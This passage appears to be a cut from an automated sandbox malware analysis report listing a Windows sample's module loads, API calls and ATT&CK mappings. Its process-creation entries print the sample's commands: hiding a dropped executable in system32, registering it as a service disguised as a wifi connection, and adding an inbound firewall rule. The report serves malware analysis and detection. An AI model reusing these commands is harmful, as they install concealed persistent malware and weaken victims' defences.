\"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ee0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"NTMARTA.DLL\" at base 74710000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77500000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"SETUPAPI.DLL\" at base 756b0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"RPCRT4.DLL\" at base 76ea0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76f50000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"PROFAPI.DLL\" at base 752c0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75370000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75860000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"SECUR32.DLL\" at base 74fd0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75460000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 705a0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77500000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"xagapalr.exe\" loaded module \"GDI32.DLL\" at base 75f20000\n \"xagapalr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75a80000\n \"xagapalr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 705a0000\n \"xagapalr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xagapalr.exe\" loaded module \"KERNEL32\" at base 77500000\n \"xagapalr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xagapalr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"xagapalr.exe\" loaded module \"KERNEL32.DLL\" at base 77500000\n \"xagapalr.exe\" loaded module \"WS2_32.DLL\" at base 75e00000\n \"xagapalr.exe\" loaded module \"DBGHELP.DLL\" at base 6f9e0000\n \"xagapalr.exe\" loaded module \"USER32.DLL\" at base 759b0000\n \"xagapalr.exe\" loaded module \"ADVAPI32.DLL\" at base 75aa0000\n \"xagapalr.exe\" loaded module \"SHELL32.DLL\" at base 75f70000\n \"xagapalr.exe\" loaded module \"OLEAUT32.DLL\" at base 75e50000\n \"xagapalr.exe\" loaded module \"MSVCR100.DLL\" at base 6a220000\n \"xagapalr.exe\" loaded module \"SSPICLI.DLL\" at base 75130000\n \"xagapalr.exe\" loaded module \"RPCRT4.DLL\" at base 76ea0000\n \"xagapalr.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76f50000\n \"xagapalr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 73140000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 705a0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 77500000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6db20000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 77500000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6d520000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6cdc0000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6b020000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77500000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6cd50000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6cc20000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6cb60000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6cb50000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6ca00000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6c8d0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 6a270000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 69f90000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 76ea0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 69e70000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6c540000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 69b50000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 69a70000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6c340000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 699c0000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 771b0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 751a0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74080000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74cb0000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 759b0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 77310000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c7f0000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 75aa0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76f50000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76f50000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 76f50000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76f50000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a40000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75240000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 70490000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75390000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74880000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74980000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 75e50000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 705a0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 77500000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 773a0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73600000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 73490000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 76ea0000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73510000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73930000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73270000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76f50000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73230000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74c70000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74b30000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73260000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75e00000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73570000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 717d0000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 75130000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76f50000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 747d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e8b6c@ADVAPI32.dll\"\n \"0e000f00703f8b6c@ADVAPI32.dll\"\n \"0e000f00cc3f8b6c@ADVAPI32.dll\"\n \"11001200b4478b6c@ADVAPI32.dll\"\n \"1100120048488b6c@ADVAPI32.dll\"\n \"120013008c488b6c@ADVAPI32.dll\"\n \"12001300e4488b6c@ADVAPI32.dll\"\n \"14001500906e8b6c@ADVAPI32.dll\"\n \"14001500a86e8b6c@ADVAPI32.dll\"\n \"14001500c06e8b6c@ADVAPI32.dll\"\n \"17001800d86e8b6c@ADVAPI32.dll\"\n \"0d000e00f06e8b6c@ADVAPI32.dll\"\n \"11001200006f8b6c@ADVAPI32.dll\"\n \"11001200146f8b6c@ADVAPI32.dll\"\n \"0d000e0034498b6c@SHELL32.dll\"\n \"0d000e00b0498b6c@SHELL32.dll\"\n \"0f00100054708b6c@ADVAPI32.dll\"\n \"1400150094708b6c@ADVAPI32.dll\"\n \"14001500ac708b6c@ADVAPI32.dll\"\n \"0c000d00f4708b6c@ADVAPI32.dll\"\n \"0c000d0004718b6c@ADVAPI32.dll\"\n \"0e000f0014718b6c@ADVAPI32.dll\"\n \"0e000f0024718b6c@ADVAPI32.dll\"\n \"0b000c0034718b6c@ADVAPI32.dll\"\n \"1400150068728b6c@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002276)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002276)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003944)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003944)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003944)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003944)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004084)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000600)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00000600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004440)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004440)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\iemwdxzd\\\" - (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\xagapalr.exe\" %WINDIR%\\system32\\iemwdxzd\\\" - (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create iemwdxzd binPath= \"%WINDIR%\\system32\\iemwdxzd\\xagapalr.exe /d\\\"C:\\3fee4a0c6c66be70f7a2c21962\" - (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description iemwdxzd \"wifi internet conection\"\" - (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start iemwdxzd\" - (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00002276)\n \"xagapalr.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004084)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74DC0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74980000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00004440)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"xagapalr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00004440)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\xagapalr.exe\" %WINDIR%\\\\system32\\\\iemwdxzd\\\\\" (UID: 00000000-00003944)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n 